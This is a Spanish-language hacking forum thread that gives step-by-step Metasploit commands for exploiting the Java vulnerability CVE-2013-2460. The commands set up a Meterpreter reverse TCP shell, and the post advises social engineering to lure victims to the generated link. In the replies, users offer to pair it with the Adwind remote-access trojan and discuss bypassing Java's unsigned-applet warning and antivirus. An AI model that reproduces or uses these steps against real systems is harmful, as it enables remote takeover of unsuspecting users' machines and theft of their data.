Imagen


CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method


Este módulo de Metasploit abusa el método inseguro invoke() de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.

Imagen


Explotando CVE-2013-2460 con mestasploit:

// Cargamos el módulo

Código: Seleccionar todo

msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter

msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

msf exploit(java_jre17_provider_skeleton) > set uripath /

msf exploit(java_jre17_provider_skeleton) > exploit
Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Imagen
Twitter: @Stuxnetr00t
adwind escribió:Alguien que suba el .jar y les hago un update con el adwind webfake con este exploit :p
[Enlace externo eliminado para invitados]

estoy matando el tiempo, mientras el tiempo nos mata lentamente..

Mostrar/Ocultar

que lastima, salta la proteccion de que el JRE no es valido o esta sin firmar.
Alguien consigue saltarse dicho mensajito??
En 1º en 2º o en 3º BETICO hasta que muera
davidad escribió:que lastima, salta la proteccion de que el JRE no es valido o esta sin firmar.
Alguien consigue saltarse dicho mensajito??
este exploit se compila sin firmar el jar davidad.
y claro funciona con las versiones que indica.
Edito: Con el jre17 si me ha dejado. Esa imagen es del 21 aunque se supone que tambien es compatible...
Ahora solo hay que luchar contra el antivirus...

Antes dejaban modificar el post en un plazo de 3horas, ¿por que ahora no?
En 1º en 2º o en 3º BETICO hasta que muera
davidad escribió:Edito: Con el jre17 si me ha dejado. Esa imagen es del 21 aunque se supone que tambien es compatible...
Ahora solo hay que luchar contra el antivirus...

Antes dejaban modificar el post en un plazo de 3horas, ¿por que ahora no?
Ya estan aplicando nuevos metodos de seguridad. Aunque en mi opinion la forma mas facil de evitar estos exploits es que se obligue al usuario a actualizar. Si no no ejecute nada.
Responder

Volver a “Exploits”